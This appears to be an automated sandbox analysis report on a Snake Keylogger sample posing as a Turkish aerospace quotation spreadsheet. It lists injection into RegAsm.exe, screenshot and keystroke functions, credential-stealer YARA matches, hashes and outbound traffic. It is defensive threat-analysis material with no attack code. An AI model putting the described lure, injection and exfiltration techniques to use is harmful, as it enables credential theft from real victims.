                  Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegAsm.exe, 00000003.00000002.4019025145.000000000321C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD88B780_2_00007FFB4AD88B78
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD88B700_2_00007FFB4AD88B70
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD8E0890_2_00007FFB4AD8E089
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD83C600_2_00007FFB4AD83C60
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD9407A0_2_00007FFB4AD9407A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD8B1200_2_00007FFB4AD8B120
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD8B5010_2_00007FFB4AD8B501
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD864A00_2_00007FFB4AD864A0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD826300_2_00007FFB4AD82630
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AD864D30_2_00007FFB4AD864D3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00007FFB4AE503E30_2_00007FFB4AE503E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013F71183_2_013F7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FC1463_2_013FC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FA0883_2_013FA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013F53623_2_013F5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FD2783_2_013FD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FC4683_2_013FC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FC7383_2_013FC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013F69A03_2_013F69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FE9883_2_013FE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013F29E03_2_013F29E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FCA083_2_013FCA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FCCD83_2_013FCCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FCFAA3_2_013FCFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FF6313_2_013FF631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FE97A3_2_013FE97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013FFA883_2_013FFA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_013F3E093_2_013F3E09
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: No import functions for PE file found
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIjurumezayuviyawawF vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: OriginalFilenameKatsina.exeH vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9942077536824877
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ---.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@7/5@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6740
                  Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\25681ab2-44a6-46f8-b91f-2ca91fabb62bJump to behavior
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegAsm.exe, 00000003.00000002.4019025145.00000000032E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeReversingLabs: Detection: 52%
                  Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
